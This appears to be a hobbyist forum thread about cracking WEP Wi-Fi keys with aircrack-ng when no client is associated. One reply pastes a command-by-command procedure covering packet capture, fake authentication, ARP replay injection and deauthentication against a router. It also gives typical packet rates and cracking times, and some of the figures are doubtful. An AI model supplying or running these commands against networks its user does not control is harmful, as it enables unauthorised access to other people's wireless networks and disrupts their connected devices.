What exactly are IVs?

In airodump if I am making a fake client then should this show up i.e. if there is only one router im trying to crack and no other clients should I see 2 MACs (the AP and fake client)?

How would I get another client showing up in airodump?

Can someone direct me to the best place to research WEP cracking with no other clients.

Cheers

yo, i read the other post when u were asking about the same thing and i wanted to know myself. i dont have the link but i did find this.
Producing encrypted packets for WEP breaking - No Client Present:

This attack is only useful when you need an associated MAC address there is currently no associated client. However it is generally better to use the MAC address of a real client as in the Producing encrypted packets for WEP breaking - Client Present attack.

Open a console and start airodump:

airodump-ng -w [filename] -c [channel] [interface]

"Some access points require reassociation every 30 seconds, otherwise our fake client is considered disconnected." Open a second console and setup the associate/reassociate to the access point:

aireplay-ng -1 20 -e [ESSID] -a 11:11:11:11:11:11 -h 33:33:33:33:33:33 [interface]

If the association stops you may need to manually restart, however after a while even though the association requests (aireplay -1 20) stopped encrypted packets were still being collected ok.

Now open a third console and start listening for ARP requests with the -3 option:

aireplay-ng -3 -b 11:11:11:11:11:11 -h 33:33:33:33:33:33 [interface]

It may take a little time to pickup some ARP packets initially, if successful airodump should now be collecting encrypted packets at a rate of roughly 3,000/min.

Receiving no ARP requests?

If after sometime aireplay is still stalling on "(got 0 ARP requests)" you can attempt to speed this process up with some deauths (e.g. aireplay -0 10...., as below) followed by some more auths (e.g. aireplay -1 20...., as below).

aireplay-ng -0 10 -a 11:11:11:11:11:11 -c 33:33:33:33:33:33 [interface] (Deauth)

aireplay-ng -1 20 -e [ESSID] -a 11:11:11:11:11:11 -h 33:33:33:33:33:33 [interface] (Association request)

if you keep waiting while it sends Association Requests, it should start collecting them after awhile.

Cheers for the reply, i actually got some arp requests and 8 IVs (initialization vectors - not enough for 64bit (need 250)) using your code.

Would it be better to use the fake or the current MAC for the 33:33:33:33:33:33 you put down. Its just these are the options i find in macchanger.

Im working with a different card now that supports packet injection for sure.

I know just as much as you. Im a big noob trying to help another noob. its like the blind leading the blind. You dont need to use 33:33:33:33:33:33. use anything you like. 11:11:11:11:11:11 was an example. you would put the Routers MAC there. You dont really need to inject packets to crack your wep. i cracked my wep without injecting any packets. it took 40min to collect 300,000 IVs and 10min to crack the 64bit wep. i know thats slow but i dont care, i got it in the end.